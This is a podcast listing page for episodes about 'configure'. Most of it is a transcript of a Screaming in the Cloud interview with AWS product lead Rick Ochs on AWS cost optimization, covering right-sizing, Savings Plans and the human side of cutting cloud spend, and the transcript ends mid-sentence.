Podcasts about configure

  • 173PODCASTS
  • 411EPISODES
  • 26mAVG DURATION
  • 1EPISODE EVERY OTHER WEEK
  • Dec 15, 2022LATEST

POPULARITY

20152016201720182019202020212022


Best podcasts about configure

Latest podcast episodes about configure

Conversion Tracking Playbook
How To Configure & Extract Insights From Your Data Stack with Andrew Campbell @ OpenStore

Conversion Tracking Playbook

Play Episode Listen Later Dec 15, 2022 36:01


Brad Redding and and Jon Cairo from Elevar host special guest Andrew Campbell, Head of Data Science at OpenStore, to dive deep into data warehouse use cases and tips to get started, competitive advantages to maintaining your own data warehouse, how OpenStore operates their  data stack to extract insights, why the iOS14 release and potential impact may have been a crutch for some, and how OpenStore approaches valuations when acquiring D2C brands -- what metrics matter.-----We release new episodes every week that go deep into the world of tracking, analytics, and conversion optimization. Be sure to subscribe so you never miss an episode.-----Links from episode:- Open.Store - FiveTran- Andrew Campbell (LinkedIn)-----And if you're new to Elevar, Elevar automates server-side conversion tracking for Shopify. Check us out!

Going Linux
Going Linux #433 · Run Ubuntu MATE On A 2-in-1 Convertible Laptop

Going Linux

Play Episode Listen Later Dec 2, 2022 17:34


My Lenovo Flex 5i is a 2-in-1 laptop with the ability to use the touch screen with a finger or an included stylus on the screen. Ubuntu MATE provides support for touch screens by default. I did have to make some adjustments to the stylus/screen mapping when using the stylus. In this episode I describe those adjustments and link to our article that describes some optional additional setup steps that make it more convenient to use the laptop in tablet mode. Episode Time Stamps 00:00 Going Linux #433 · Run Ubuntu MATE On A 2-in-1 Convertible Laptop 00:60 5 Steps To Configure The Lenovo IdeaPad Flex 5i With It's Stylus Using Ubuntu MATE 03:36 How to map the stylus correctly for different screen orientations 04:14 1. Determine the names of the touch-enabled hardware 05:37 2. Determine the coordinate map for each device 08:05 3. Create on-screen buttons 09:47 4. Create the panel buttons 12:21 5. Enable the on-screen keyboard 14:15 Bonus step: Configure the stylus hardware buttons 16:34 goinglinux.com, goinglinux@gmail.com, +1-904-468-7889, @goinglinux, feedback, listen, subscribe 17:34 End

Screaming in the Cloud
The Complexities of AWS Cost Optimization with Rick Ochs

Screaming in the Cloud

Play Episode Listen Later Dec 1, 2022 46:56


About RickRick is the Product Leader of the AWS Optimization team. He previously led the cloud optimization product organization at Turbonomic, and previously was the Microsoft Azure Resource Optimization program owner.Links Referenced: AWS: https://console.aws.amazon.com LinkedIn: https://www.linkedin.com/in/rick-ochs-06469833/ Twitter: https://twitter.com/rickyo1138 TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: This episode is sponsored in part by our friends at Chronosphere. Tired of observability costs going up every year without getting additional value? Or being locked in to a vendor due to proprietary data collection, querying and visualization? Modern day, containerized environments require a new kind of observability technology that accounts for the massive increase in scale and attendant cost of data. With Chronosphere, choose where and how your data is routed and stored, query it easily, and get better context and control. 100% open source compatibility means that no matter what your setup is, they can help. Learn how Chronosphere provides complete and real-time insight into ECS, EKS, and your microservices, whereever they may be at snark.cloud/chronosphere That's snark.cloud/chronosphere Corey: This episode is bought to you in part by our friends at Veeam. Do you care about backups? Of course you don't. Nobody cares about backups. Stop lying to yourselves! You care about restores, usually right after you didn't care enough about backups.  If you're tired of the vulnerabilities, costs and slow recoveries when using snapshots to restore your data, assuming you even have them at all living in AWS-land, there is an alternative for you. Check out Veeam, thats V-E-E-A-M for secure, zero-fuss AWS backup that won't leave you high and dry when it's time to restore. Stop taking chances with your data. Talk to Veeam. My thanks to them for sponsoring this ridiculous podcast.Corey: Welcome to Screaming in the Cloud. I'm Corey Quinn. For those of you who've been listening to this show for a while, the theme has probably emerged, and that is that one of the key values of this show is to give the guest a chance to tell their story. It doesn't beat the guests up about how they approach things, it doesn't call them out for being completely wrong on things because honestly, I'm pretty good at choosing guests, and I don't bring people on that are, you know, walking trash fires. And that is certainly not a concern for this episode.But this might devolve into a screaming loud argument, despite my best effort. Today, I'm joined by Rick Ochs, Principal Product Manager at AWS. Rick, thank you for coming back on the show. The last time we spoke, you were not here you were at, I believe it was Turbonomic.Rick: Yeah, that's right. Thanks for having me on the show, Corey. I'm really excited to talk to you about optimization and my current role and what we're doing.Corey: Well, let's start at the beginning. Principal product manager. It sounds like one of those corporate titles that can mean a different thing in every company or every team that you're talking to. What is your area of responsibility? Where do you start and where do you stop?Rick: Awesome. So, I am the product manager lead for all of AWS Optimizations Team. So, I lead the product team. That includes several other product managers that focus in on Compute Optimizer, Cost Explorer, right-sizing recommendations, as well as Reservation and Savings Plan purchase recommendations.Corey: In other words, you are the person who effectively oversees all of the AWS cost optimization tooling and approaches to same?Rick: Yeah.Corey: Give or take. I mean, you could argue that oh, every team winds up focusing on helping customers save money. I could fight that argument just as effectively. But you effectively start and stop with respect to helping customers save money or understand where the money is going on their AWS bill.Rick: I think that's a fair statement. And I also agree with your comment that I think a lot of service teams do think through those use cases and provide capabilities, you know? There's, like, S3 storage lines. You know, there's all sorts of other products that do offer optimization capabilities as well, but as far as, like, the unified purpose of my team, it is, unilaterally focused on how do we help customers safely reduce their spend and not hurt their business at the same time.Corey: Safely being the key word. For those who are unaware of my day job, I am a partial owner of The Duckbill Group, a consultancy where we fix exactly one problem: the horrifying AWS bill. This is all that I've been doing for the last six years, so I have some opinions on AWS bill reduction as well. So, this is going to be a fun episode for the two of us to wind up, mmm, more or less smacking each other around, but politely because we are both professionals. So, let's start with a very high level. How does AWS think about AWS bills from a customer perspective? You talk about optimizing it, but what does that mean to you?Rick: Yeah. So, I mean, there's a lot of ways to think about it, especially depending on who I'm talking to, you know, where they sit in our organization. I would say I think about optimization in four major themes. The first is how do you scale correctly, whether that's right-sizing or architecting things to scale in and out? The second thing I would say is, how do you do pricing and discounting, whether that's Reservation management, Savings Plan Management, coverage, how do you handle the expenditures of prepayments and things like that?Then I would say suspension. What that means is turn the lights off when you leave the room. We have a lot of customers that do this and I think there's a lot of opportunity for more. Turning EC2 instances off when they're not needed if they're non-production workloads or other, sort of, stateful services that charge by the hour, I think there's a lot of opportunity there.And then the last of the four methods is clean up. And I think it's maybe one of the lowest-hanging fruit, but essentially, are you done using this thing? Delete it. And there's a whole opportunity of cleaning up, you know, IP addresses unattached EBS volumes, sort of, these resources that hang around in AWS accounts that sort of getting lost and forgotten as well. So, those are the four kind of major thematic strategies for how to optimize a cloud environment that we think about and spend a lot of time working on.Corey: I feel like there's—or at least the way that I approach these things—that there are a number of different levels you can look at AWS billing constructs on. The way that I tend to structure most of my engagements when I'm working with clients is we come in and, step one: cool. Why do you care about the AWS bill? It's a weird question to ask because most of the engineering folks look at me like I've just grown a second head. Like, “So, why do you care about your AWS bill?” Like, “What? Why do you? You run a company doing this?”It's no, no, no, it's not that I'm being rhetorical and I don't—I'm trying to be clever somehow and pretend that I don't understand all the nuances around this, but why does your business care about lowering the AWS bill? Because very often, the answer is they kind of don't. What they care about from a business perspective is being able to accurately attribute costs for the service or good that they provide, being able to predict what that spend is going to be, and also yes, a sense of being good stewards of the money that has been entrusted to them by via investors, public markets, or the budget allocation process of their companies and make sure that they're not doing foolish things with it. And that makes an awful lot of sense. It is rare at the corporate level that the stated number one concern is make the bills lower.Because at that point, well, easy enough. Let's just turn off everything you're running in production. You'll save a lot of money in your AWS bill. You won't be in business anymore, but you'll be saving a lot of money on the AWS bill. The answer is always deceptively nuanced and complicated.At least, that's how I see it. Let's also be clear that I talk with a relatively narrow subset of the AWS customer totality. The things that I do are very much intentionally things that do not scale. Definitionally, everything that you do has to scale. How do you wind up approaching this in ways that will work for customers spending billions versus independent learners who are paying for this out of their own personal pocket?Rick: It's not easy [laugh], let me just preface that. The team we have is incredible and we spent so much time thinking about scale and the different personas that engage with our products and how they're—what their experience is when they interact with a bill or AWS platform at large. There's also a couple of different personas here, right? We have a persona that focuses in on that cloud cost, the cloud bill, the finance, whether that's—if an organization is created a FinOps organization, if they have a Cloud Center of Excellence, versus an engineering team that maybe has started to go towards decentralized IT and has some accountability for the spend that they attribute to their AWS bill. And so, these different personas interact with us in really different ways, where Cost Explorer downloading the CUR and taking a look at the bill.And one thing that I always kind of imagine is somebody putting a headlamp on and going into the caves in the depths of their AWS bill and kind of like spelunking through their bill sometimes, right? And so, you have these FinOps folks and billing people that are deeply interested in making sure that the spend they do have meets their business goals, meaning this is providing high value to our company, it's providing high value to our customers, and we're spending on the right things, we're spending the right amount on the right things. Versus the engineering organization that's like, “Hey, how do we configure these resources? What types of instances should we be focused on using? What services should we be building on top of that maybe are more flexible for our business needs?”And so, there's really, like, two major personas that I spend a lot of time—our organization spends a lot of time wrapping our heads around. Because they're really different, very different approaches to how we think about cost. Because you're right, if you just wanted to lower your AWS bill, it's really easy. Just size everything to a t2.nano and you're done and move on [laugh], right? But you're [crosstalk 00:08:53]—Corey: Aw, t3 or t4.nano, depending upon whether regional availability is going to save you less. I'm still better at this. Let's not kid ourselves I kid. Mostly.Rick: For sure. So t4.nano, absolutely.Corey: T4g. Remember, now the way forward is everything has an explicit letter designator to define which processor company made the CPU that underpins the instance itself because that's a level of abstraction we certainly wouldn't want the cloud provider to take away from us any.Rick: Absolutely. And actually, the performance differences of those different processor models can be pretty incredible [laugh]. So, there's huge decisions behind all of that as well.Corey: Oh, yeah. There's so many factors that factor in all these things. It's gotten to a point of you see this usually with lawyers and very senior engineers, but the answer to almost everything is, “It depends.” There are always going to be edge cases. Easy example of, if you check a box and enable an S3 Gateway endpoint inside of a private subnet, suddenly, you're not passing traffic through a 4.5 cent per gigabyte managed NAT Gateway; it's being sent over that endpoint for no additional cost whatsoever.Check the box, save a bunch of money. But there are scenarios where you don't want to do it, so always double-checking and talking to customers about this is critically important. Just because, the first time you make a recommendation that does not work for their constraints, you lose trust. And make a few of those and it looks like you're more or less just making naive recommendations that don't add any value, and they learn to ignore you. So, down the road, when you make a really high-value, great recommendation for them, they stop paying attention.Rick: Absolutely. And we have that really high bar for recommendation accuracy, especially with right sizing, that's such a key one. Although I guess Savings Plan purchase recommendations can be critical as well. If a customer over commits on the amount of Savings Plan purchase they need to make, right, that's a really big problem for them.So, recommendation accuracy must be above reproach. Essentially, if a customer takes a recommendation and it breaks an application, they're probably never going to take another right-sizing recommendation again [laugh]. And so, this bar of trust must be exceptionally high. That's also why out of the box, the compute optimizer recommendations can be a little bit mild, they're a little time because the first order of business is do no harm; focus on the performance requirements of the application first because we have to make sure that the reason you build these workloads in AWS is served.Now ideally, we do that without overspending and without overprovisioning the capacity of these workloads, right? And so, for example, like if we make these right-sizing recommendations from Compute Optimizer, we're taking a look at the utilization of CPU, memory, disk, network, throughput, iops, and we're vending these recommendations to customers. And when you take that recommendation, you must still have great application performance for your business to be served, right? It's such a crucial part of how we optimize and run long-term. Because optimization is not a one-time Band-Aid; it's an ongoing behavior, so it's really critical that for that accuracy to be exceptionally high so we can build business process on top of it as well.Corey: Let me ask you this. How do you contextualize what the right approach to optimization is? What is your entire—there are certain tools that you have… by ‘you,' I mean, of course, as an organization—have repeatedly gone back to and different approaches that don't seem to deviate all that much from year to year, and customer to customer. How do you think about the general things that apply universally?Rick: So, we know that EC2 is a very popular service for us. We know that sizing EC2 is difficult. We think about that optimization pillar of scaling. It's an obvious area for us to help customers. We run into this sort of industry-wide experience where whenever somebody picks the size of a resource, they're going to pick one generally larger than they need.It's almost like asking a new employee at your company, “Hey, pick your laptop. We have a 16 gig model or a 32 gig model. Which one do you want?” That person [laugh] making the decision on capacity, hardware capacity, they're always going to pick the 32 gig model laptop, right? And so, we have this sort of human nature in IT of, we don't want to get called at two in the morning for performance issues, we don't want our apps to fall over, we want them to run really well, so we're going to size things very conservatively and we're going to oversize things.So, we can help customers by providing those recommendations to say, you can size things up in a different way using math and analytics based on the utilization patterns, and we can provide and pick different instance types. There's hundreds and hundreds of instance types in all of these regions across the globe. How do you know which is the right one for every single resource you have? It's a very, very hard problem to solve and it's not something that is lucrative to solve one by one if you have 100 EC2 instances. Trying to pick the correct size for each and every one can take hours and hours of IT engineering resources to look at utilization graphs, look at all of these types available, look at what is the performance difference between processor models and providers of those processors, is there application compatibility constraints that I have to consider? The complexity is astronomical.And then not only that, as soon as you make that sizing decision, one week later, it's out of date and you need a different size. So, [laugh] you didn't really solve the problem. So, we have to programmatically use data science and math to say, “Based on these utilization values, these are the sizes that would make sense for your business, that would have the lowest cost and the highest performance together at the same time.” And it's super important that we provide this capability from a technology standpoint because it would cost so much money to try to solve that problem that the savings you would achieve might not be meaningful. Then at the same time… you know, that's really from an engineering perspective, but when we talk to the FinOps and the finance folks, the conversations are more about Reservations and Savings Plans.How do we correctly apply Savings Plans and Reservations across a high percentage of our portfolio to reduce the costs on those workloads, but not so much that dynamic capacity levels in our organization mean we all of a sudden have a bunch of unused Reservations or Savings Plans? And so, a lot of organizations that engage with us and we have conversations with, we start with the Reservation and Savings Plan conversation because it's much easier to click a few buttons and buy a Savings Plan than to go institute an entire right-sizing campaign across multiple engineering teams. That can be very difficult, a much higher bar. So, some companies are ready to dive into the engineering task of sizing; some are not there yet. And they're a little maybe a little earlier in their FinOps journey, or the building optimization technology stacks, or achieving higher value out of their cloud environments, so starting with kind of the low hanging fruit, it can vary depending on the company, size of company, technical aptitudes, skill sets, all sorts of things like that.And so, those finance-focused teams are definitely spending more time looking at and studying what are the best practices for purchasing Savings Plans, covering my environment, getting the most out of my dollar that way. Then they don't have to engage the engineering teams; they can kind of take a nice chunk off the top of their bill and sort of have something to show for that amount of effort. So, there's a lot of different approaches to start in optimization.Corey: My philosophy runs somewhat counter to this because everything you're saying does work globally, it's safe, it's non-threatening, and then also really, on some level, feels like it is an approach that can be driven forward by finance or business. Whereas my worldview is that cost and architecture in cloud are one and the same. And there are architectural consequences of cost decisions and vice versa that can be adjusted and addressed. Like, one of my favorite party tricks—although I admit, it's a weird party—is I can look at the exploded PDF view of a customer's AWS bill and describe their architecture to them. And people have questioned that a few times, and now I have a testimonial on my client website that mentions, “It was weird how he was able to do this.”Yeah, it's real, I can do it. And it's not a skill, I would recommend cultivating for most people. But it does also mean that I think I'm onto something here, where there's always context that needs to be applied. It feels like there's an entire ecosystem of product companies out there trying to build what amount to a better Cost Explorer that also is not free the way that Cost Explorer is. So, the challenge I see there's they all tend to look more or less the same; there is very little differentiation in that space. And in the fullness of time, Cost Explorer does—ideally—get better. How do you think about it?Rick: Absolutely. If you're looking at ways to understand your bill, there's obviously Cost Explorer, the CUR, that's a very common approach is to take the CUR and put a BI front-end on top of it. That's a common experience. A lot of companies that have chops in that space will do that themselves instead of purchasing a third-party product that does do bill breakdown and dissemination. There's also the cross-charge show-back organizational breakdown and boundaries because you have these super large organizations that have fiefdoms.You know, if HR IT and sales IT, and [laugh] you know, product IT, you have all these different IT departments that are fiefdoms within your AWS bill and construct, whether they have different ABS accounts or say different AWS organizations sometimes, right, it can get extremely complicated. And some organizations require the ability to break down their bill based on those organizational boundaries. Maybe tagging works, maybe it doesn't. Maybe they do that by using a third-party product that lets them set custom scopes on their resources based on organizational boundaries. That's a common approach as well.We do also have our first-party solutions, they can do that, like the CUDOS dashboard as well. That's something that's really popular and highly used across our customer base. It allows you to have kind of a dashboard and customizable view of your AWS costs and, kind of, split it up based on tag organizational value, account name, and things like that as well. So, you mentioned that you feel like the architectural and cost problem is the same problem. I really don't disagree with that at all.I think what it comes down to is some organizations are prepared to tackle the architectural elements of cost and some are not. And it really comes down to how does the customer view their bill? Is it somebody in the finance organization looking at the bill? Is it somebody in the engineering organization looking at the bill? Ideally, it would be both.Ideally, you would have some of those skill sets that overlap, or you would have an organization that does focus in on FinOps or cloud operations as it relates to cost. But then at the same time, there are organizations that are like, “Hey, we need to go to cloud. Our CIO told us go to cloud. We don't want to pay the lease renewal on this building.” There's a lot of reasons why customers move to cloud, a lot of great reasons, right? Three major reasons you move to cloud: agility, [crosstalk 00:20:11]—Corey: And several terrible ones.Rick: Yeah, [laugh] and some not-so-great ones, too. So, there's so many different dynamics that get exposed when customers engage with us that they might or might not be ready to engage on the architectural element of how to build hyperscale systems. So, many of these customers are bringing legacy workloads and applications to the cloud, and something like a re-architecture to use stateless resources or something like Spot, that's just not possible for them. So, how can they take 20% off the top of their bill? Savings Plans or Reservations are kind of that easy, low-hanging fruit answer to just say, “We know these are fairly static environments that don't change a whole lot, that are going to exist for some amount of time.”They're legacy, you know, we can't turn them off. It doesn't make sense to rewrite these applications because they just don't change, they don't have high business value, or something like that. And so, the architecture part of that conversation doesn't always come into play. Should it? Yes.The long-term maturity and approach for cloud optimization does absolutely account for architecture, thinking strategically about how you do scaling, what services you're using, are you going down the Kubernetes path, which I know you're going to laugh about, but you know, how do you take these applications and componentize them? What services are you using to do that? How do you get that long-term scale and manageability out of those environments? Like you said at the beginning, the complexity is staggering and there's no one unified answer. That's why there's so many different entrance paths into, “How do I optimize my AWS bill?”There's no one answer, and every customer I talk to has a different comfort level and appetite. And some of them have tried suspension, some of them have gone heavy down Savings Plans, some of them want to dabble in right-sizing. So, every customer is different and we want to provide those capabilities for all of those different customers that have different appetites or comfort levels with each of these approaches.Corey: This episode is sponsored in part by our friends at Redis, the company behind the incredibly popular open source database. If you're tired of managing open source Redis on your own, or if you are looking to go beyond just caching and unlocking your data's full potential, these folks have you covered. Redis Enterprise is the go-to managed Redis service that allows you to reimagine how your geo-distributed applications process, deliver, and store data. To learn more from the experts in Redis how to be real-time, right now, from anywhere, visit redis.com/duckbill. That's R - E - D - I - S dot com slash duckbill.Corey: And I think that's very fair. I think that it is not necessarily a bad thing that you wind up presenting a lot of these options to customers. But there are some rough edges. An example of this is something I encountered myself somewhat recently and put on Twitter—because I have those kinds of problems—where originally, I remember this, that you were able to buy hourly Savings Plans, which again, Savings Plans are great; no knock there. I would wish that they applied to more services rather than, “Oh, SageMaker is going to do its own Savings Pla”—no, stop keeping me from going from something where I have to manage myself on EC2 to something you manage for me and making that cost money. You nailed it with Fargate. You nailed it with Lambda. Please just have one unified Savings Plan thing. But I digress.But you had a limit, once upon a time, of $1,000 per hour. Now, it's $5,000 per hour, which I believe in a three-year all-up-front means you will cheerfully add $130 million purchase to your shopping cart. And I kept adding a bunch of them and then had a little over a billion dollars a single button click away from being charged to my account. Let me begin with what's up with that?Rick: [laugh]. Thank you for the tweet, by the way, Corey.Corey: Always thrilled to ruin your month, Rick. You know that.Rick: Yeah. Fantastic. We took that tweet—you know, it was tongue in cheek, but also it was a serious opportunity for us to ask a question of what does happen? And it's something we did ask internally and have some fun conversations about. I can tell you that if you clicked purchase, it would have been declined [laugh]. So, you would have not been—Corey: Yeah, American Express would have had a problem with that. But the question is, would you have attempted to charge American Express, or would something internally have gone, “This has a few too many commas for us to wind up presenting it to the card issuer with a straight face?”Rick: [laugh]. Right. So, it wouldn't have gone through and I can tell you that, you know, if your account was on a PO-based configuration, you know, it would have gone to the account team. And it would have gone through our standard process for having a conversation with our customer there. That being said, we are—it's an awesome opportunity for us to examine what is that shopping cart experience.We did increase the limit, you're right. And we increased the limit for a lot of reasons that we sat down and worked through, but at the same time, there's always an opportunity for improvement of our product and experience, we want to make sure that it's really easy and lightweight to use our products, especially purchasing Savings Plans. Savings Plans are already kind of wrought with mental concern and risk of purchasing something so expensive and large that has a big impact on your AWS bill, so we don't really want to add any more friction necessarily the process but we do want to build an awareness and make sure customers understand, “Hey, you're purchasing this. This has a pretty big impact.” And so, we're also looking at other ways we can kind of improve the ability for the Savings Plan shopping cart experience to ensure customers don't put themselves in a position where you have to unwind or make phone calls and say, “Oops.” Right? We [laugh] want to avoid those sorts of situations for our customers. So, we are looking at quite a few additional improvements to that experience as well that I'm really excited about that I really can't share here, but stay tuned.Corey: I am looking forward to it. I will say the counterpoint to that is having worked with customers who do make large eight-figure purchases at once, there's a psychology element that plays into it. Everyone is very scared to click the button on the ‘Buy It Now' thing or the ‘Approve It.' So, what I've often found is at that scale, one, you can reduce what you're buying by half of it, and then see how that treats you and then continue to iterate forward rather than doing it all at once, or reach out to your account team and have them orchestrate the buy. In previous engagements, I had a customer do this religiously and at one point, the concierge team bought the wrong thing in the wrong region, and from my perspective, I would much rather have AWS apologize for that and fix it on their end, than from us having to go with a customer side of, “Oh crap, oh, crap. Please be nice to us.”Not that I doubt you would do it, but that's not the nervous conversation I want to have in quite the same way. It just seems odd to me that someone would want to make that scale of purchase without ever talking to a human. I mean, I get it. I'm as antisocial as they come some days, but for that kind of money, I kind of just want another human being to validate that I'm not making a giant mistake.Rick: We love that. That's such a tremendous opportunity for us to engage and discuss with an organization that's going to make a large commitment, that here's the impact, here's how we can help. How does it align to our strategy? We also do recommend, from a strategic perspective, those more incremental purchases. I think it creates a better experience long-term when you don't have a single Savings Plan that's going to expire on a specific day that all of a sudden increases your entire bill by a significant percentage.So, making staggered monthly purchases makes a lot of sense. And it also works better for incremental growth, right? If your organization is growing 5% month-over-month or year-over-year or something like that, you can purchase those incremental Savings Plans that sort of stack up on top of each other and then you don't have that risk of a cliff one day where one super-large SP expires and boom, you have to scramble and repurchase within minutes because every minute that goes by is an additional expense, right? That's not a great experience. And so that's, really, a large part of why those staggered purchase experiences make a lot of sense.That being said, a lot of companies do their math and their finance in different ways. And single large purchases makes sense to go through their process and their rigor as well. So, we try to support both types of purchasing patterns.Corey: I think that is an underappreciated aspect of cloud cost savings and cloud cost optimization, where it is much more about humans than it is about math. I see this most notably when I'm helping customers negotiate their AWS contracts with AWS, where they are often perspectives such as, “Well, we feel like we really got screwed over last time, so we want to stick it to them and make them give us a bigger percentage discount on something.” And it's like, look, you can do that, but I would much rather, if it were me, go for something that moves the needle on your actual business and empowers you to move faster, more effectively, and lead to an outcome that is a positive for everyone versus the well, we're just going to be difficult in this one point because they were difficult on something last time. But ego is a thing. Human psychology is never going to have an API for it. And again, customers get to decide their own destiny in some cases.Rick: I completely agree. I've actually experienced that. So, this is the third company I've been working at on Cloud optimization. I spent several years at Microsoft running an optimization program. I went to Turbonomic for several years, building out the right-sizing and savings plan reservation purchase capabilities there, and now here at AWS.And through all of these journeys and experiences working with companies to help optimize their cloud spend, I can tell you that the psychological needle—moving the needle is significantly harder than the technology stack of sizing something correctly or deleting something that's unused. We can solve the technology part. We can build great products that identify opportunities to save money. There's still this psychological component of IT, for the last several decades has gone through this maturity curve of if it's not broken, don't touch it. Five-nines, six sigma, all of these methods of IT sort of rationalizing do no harm, don't touch anything, everything must be up.And it even kind of goes back several decades. Back when if you rebooted a physical server, the motherboard capacitors would pop, right? So, there's even this anti—or this stigma against even rebooting servers sometimes. In the cloud really does away with a lot of that stuff because we have live migration and we have all of these, sort of, stateless designs and capabilities, but we still carry along with us this mentality of don't touch it; it might fall over. And we have to really get past that.And that means that the trust, we went back to the trust conversation where we talk about the recommendations must be incredibly accurate. You're risking your job, in some cases; if you are a DevOps engineer, and your commitments on your yearly goals are uptime, latency, response time, load time, these sorts of things, these operational metrics, KPIs that you use, you don't want to take a downsized recommendation. It has a severe risk of harming your job and your bonus.Corey: “These instances are idle. Turn them off.” It's like, yeah, these instances are the backup site, or the DR environment, or—Rick: Exactly.Corey: —something that takes very bursty but occasional traffic. And yeah, I know it costs us some money, but here's the revenue figures for having that thing available. Like, “Oh, yeah. Maybe we should shut up and not make dumb recommendations around things,” is the human response, but computers don't have that context.Rick: Absolutely. And so, the accuracy and trust component has to be the highest bar we meet for any optimization activity or behavior. We have to circumvent or supersede the human aversion, the risk aversion, that IT is built on, right?Corey: Oh, absolutely. And let's be clear, we see this all the time where I'm talking to customers and they have been burned before because we tried to save money and then we took a production outage as a side effect of a change that we made, and now we're not allowed to try to save money anymore. And there's a hidden truth in there, which is auto-scaling is something that a lot of customers talk about, but very few have instrumented true auto-scaling because they interpret is we can scale up to meet demand. Because yeah, if you don't do that you're dropping customers on the floor.Well, what about scaling back down again? And the answer there is like, yeah, that's not really a priority because it's just money. We're not disappointing customers, causing brand reputation, and we're still able to take people's money when that happens. It's only money; we can fix it later. Covid shined a real light on a lot of the stuff just because there are customers that we've spoken to who's—their user traffic dropped off a cliff, infrastructure spend remained constant day over day.And yeah, they believe, genuinely, they were auto-scaling. The most interesting lies are the ones that customers tell themselves, but the bill speaks. So, getting a lot of modernization traction from things like that was really neat to watch. But customers I don't think necessarily intuitively understand most aspects of their bill because it is a multidisciplinary problem. It's engineering, its finance, its accounting—which is not the same thing as finance—and you need all three of those constituencies to be able to communicate effectively using a shared and common language. It feels like we're marriage counseling between engineering and finance, most weeks.Rick: Absolutely, we are. And it's important we get it right, that the data is accurate, that the recommendations we provide are trustworthy. If the finance team gets their hands on the savings potential they see out of right-sizing, takes it to engineering, and then engineering comes back and says, “No, no, no, we can't actually do that. We can't actually size those,” right, we have problems. And they're cultural, they're transformational. Organizations' appetite for these things varies greatly and so it's important that we address that problem from all of those angles. And it's not easy to do.Corey: How big do you find the optimization problem is when you talk to customers? How focused are they on it? I have my answers, but that's the scale of anec-data. I want to hear your actual answer.Rick: Yeah. So, we talk with a lot of customers that are very interested in optimization. And we're very interested in helping them on the journey towards having an optimal estate. There are so many nuances and barriers, most of them psychological like we already talked about.I think there's this opportunity for us to go do better exposing the potential of what an optimal AWS estate would look like from a dollar and savings perspective. And so, I think it's kind of not well understood. I think it's one of the biggest areas or barriers of companies really attacking the optimization problem with more vigor is if they knew that the potential savings they could achieve out of their AWS environment would really align their spend much more closely with the business value they get, I think everybody would go bonkers. And so, I'm really excited about us making progress on exposing that capability or the total savings potential and amount. It's something we're looking into doing in a much more obvious way.And we're really excited about customers doing that on AWS where they know they can trust AWS to get the best value for their cloud spend, that it's a long-term good bet because their resources that they're using on AWS are all focused on giving business value. And that's the whole key. How can we align the dollars to the business value, right? And I think optimization is that connection between those two concepts.Corey: Companies are generally not going to greenlight a project whose sole job is to save money unless there's something very urgent going on. What will happen is as they iterate forward on the next generation of services or a migration of a service from one thing to another, they will make design decisions that benefit those optimizations. There's low-hanging fruit we can find, usually of the form, “Turn that thing off,” or, “Configure this thing slightly differently,” that doesn't take a lot of engineering effort in place. But, on some level, it is not worth the engineering effort it takes to do an optimization project. We've all met those engineers—speaking is one of them myself—who, left to our own devices, will spend two months just knocking a few hundred bucks a month off of our AWS developer environment.We steal more than office supplies. I'm not entirely sure what the business value of doing that is, in most cases. For me, yes, okay, things that work in small environments work very well in large environments, generally speaking, so I learned how to save 80 cents here and that's a few million bucks a month somewhere else. Most folks don't have that benefit happening, so it's a question of meeting them where they are.Rick: Absolutely. And I think the scale component is huge, which you just touched on. When you're talking about a hundred EC2 instances versus a thousand, optimization becomes kind of a different component of how you manage that AWS environment. And while single-decision recommendations to scale an individual server, the dollar amount might be different, the percentages are just about the same when you look at what is it to be sized correctly, what is it to be configured correctly? And so, it really does come down to priority.And so, it's really important to really support all of those companies of all different sizes and industries because they will have different experiences on AWS. And some will have more sensitivity to cost than others, but all of them want to get great business value out of their AWS spend. And so, as long as we're meeting that need and we're supporting our customers to make sure they understand the commitment we have to ensuring that their AWS spend is valuable, it is meaningful, right, they're not spending money on things that are not adding value, that's really important to us.Corey: I do want to have as the last topic of discussion here, how AWS views optimization, where there have been a number of repeated statements where helping customers optimize their cloud spend is extremely important to us. And I'm trying to figure out where that falls on the spectrum from, “It's the thing we say because they make us say it, but no, we're here to milk them like cows,” all the way on over to, “No, no, we passionately believe in this at every level, top to bottom, in every company. We are just bad at it.” So, I'm trying to understand how that winds up being expressed from your lived experience having solved this problem first outside, and then inside.Rick: Yeah. So, it's kind of like part of my personal story. It's the main reason I joined AWS. And, you know, when you go through the interview loops and you talk to the leaders of an organization you're thinking about joining, they always stop at the end of the interview and ask, “Do you have any questions for us?” And I asked that question to pretty much every single person I interviewed with. Like, “What is AWS's appetite for helping customers save money?”Because, like, from a business perspective, it kind of is a little bit wonky, right? But the answers were varied, and all of them were customer-obsessed and passionate. And I got this sense that my personal passion for helping companies have better efficiency of their IT resources was an absolute primary goal of AWS and a big element of Amazon's leadership principle, be customer obsessed. Now, I'm not a spokesperson, so [laugh] we'll see, but we are deeply interested in making sure our customers have a great long-term experience and a high-trust relationship. And so, when I asked these questions in these interviews, the answers were all about, “We have to do the right thing for the customer. It's imperative. It's also in our DNA. It's one of the most important leadership principles we have to be customer-obsessed.”And it is the primary reason why I joined: because of that answer to that question. Because it's so important that we achieve a better efficiency for our IT resources, not just for, like, AWS, but for our planet. If we can reduce consumption patterns and usage across the planet for how we use data centers and all the power that goes into them, we can talk about meaningful reductions of greenhouse gas emissions, the cost and energy needed to run IT business applications, and not only that, but most all new technology that's developed in the world seems to come out of a data center these days, we have a real opportunity to make a material impact to how much resource we use to build and use these things. And I think we owe it to the planet, to humanity, and I think Amazon takes that really seriously. And I'm really excited to be here because of that.Corey: As I recall—and feel free to make sure that this comment never sees the light of day—you asked me before interviewing for the role and then deciding to accept it, what I thought about you working there and whether I would recommend it, whether I wouldn't. And I think my answer was fairly nuanced. And you're working there now and we still are on speaking terms, so people can probably guess what my comments took the shape of, generally speaking. So, I'm going to have to ask now; it's been, what, a year since you joined?Rick: Almost. I think it's been about eight months.Corey: Time during a pandemic is always strange. But I have to ask, did I steer you wrong?Rick: No. Definitely not. I'm very happy to be here. The opportunity to help such a broad range of companies get more value out of technology—and it's not just cost, right, like we talked about. It's actually not about the dollar number going down on a bill. It's about getting more value and moving the needle on how do we efficiently use technology to solve business needs.And that's been my career goal for a really long time, I've been working on optimization for, like, seven or eight, I don't know, maybe even nine years now. And it's like this strange passion for me, this combination of my dad taught me how to be a really good steward of money and a great budget manager, and then my passion for technology. So, it's this really cool combination of, like, childhood life skills that really came together for me to create a career that I'm really passionate about. And this move to AWS has been such a tremendous way to supercharge my ability to scale my personal mission, and really align it to AWS's broader mission of helping companies achieve more with cloud platforms, 